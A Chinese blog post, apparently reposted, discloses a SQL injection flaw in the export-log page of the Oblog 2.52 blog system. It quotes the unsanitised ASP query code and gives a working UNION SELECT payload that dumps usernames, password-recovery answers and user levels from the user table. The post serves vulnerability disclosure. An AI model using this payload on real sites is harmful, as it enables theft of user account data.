Oblog 2.52导出日志最新漏洞
发表于:2007-06-30来源:作者:点击数:
标签:
Oblog 2.52导出日志最新漏洞 /** 作者:慈勤强 Http://blog.csdn.net/cqq 2005-02-22 */ 昨天正好从oblog官方网站下载了一套最新的blog系统,版本是2.52的吧。 本来是在qq上看到一个朋友讨论help.asp文件的入侵思路的, 那篇文章在这里可以找到, http://blog
Oblog 2.52导出日志最新漏洞
/**
作者:慈勤强
Http://blog.csdn.net/cqq
2005-02-22
*/
昨天正好从oblog官方网站
下载了一套最新的blog系统,版本是2.52的吧。
本来是在qq上看到一个朋友讨论help.asp文件的入侵思路的,
那篇文章在这里可以找到,
http://blog.csdn.net/cqq/archive/2005/02/22/297316.aspx
之后,顺手注册了一个用户,大体浏览了一下,
在后台有个导出日志的功能比较好,
这样就可以防止由于blog站点关闭,而自己辛辛苦苦写的文章没法保存的问题了。
csdn的blog就没有导出日志的功能,为此我还特意写了个小程序,
请看这里:
http://blog.csdn.net/cqq/archive/2005/02/04/280545.aspx
不过,这个导出日志的asp文件存在sql injection漏洞,
本来是导出自己的文章的,
这样一来,
数据库里的任何数据都可以随便导出了,
直接危害到整个blog系统的
安全。
主要的
SQL代码如下:
sdate=request("selecty")&"-"&request("selectm")&"-"&request("selec
td")
edate=request("selectey")&"-"&request("selectem")&"-"&request("selected")
sql="select topic,addtime,logtext from blog where username=‘’"&username&"‘’ and addtime<=#"&edate&"# and
addtime>=#"&sdate&"#"
大家看到,所有的客户端数据都没有经过检查就直接使用了,
自然会有问题,
因为不管什么情况,客户端的数据都是不可轻易相信的。
那么,我们构造这样的输入
"selectd=22# and 1=2 union select username,answer,userlevel from [user] union select topic,addtime,logtext from blog
where addtime<=#1900-1-1"
整个的sql语句就变为了:
select topic,addtime,logtext from blog where username=‘’慈勤强‘’ and addtime<=#2007-2-22# and addtime>=#2000-2-22# and
1=2
union select username,answer,userlevel from [user]
union select topic,addtime,logtext from blog where addtime<=#1900-1-1#
这样,就可以输出所有的用户名、用户密码提示问题答案和用户等级了
当然也可以得到数据库中的任何内容了,只要适当的变换sql语句。
原文转自:http://www.ltesting.net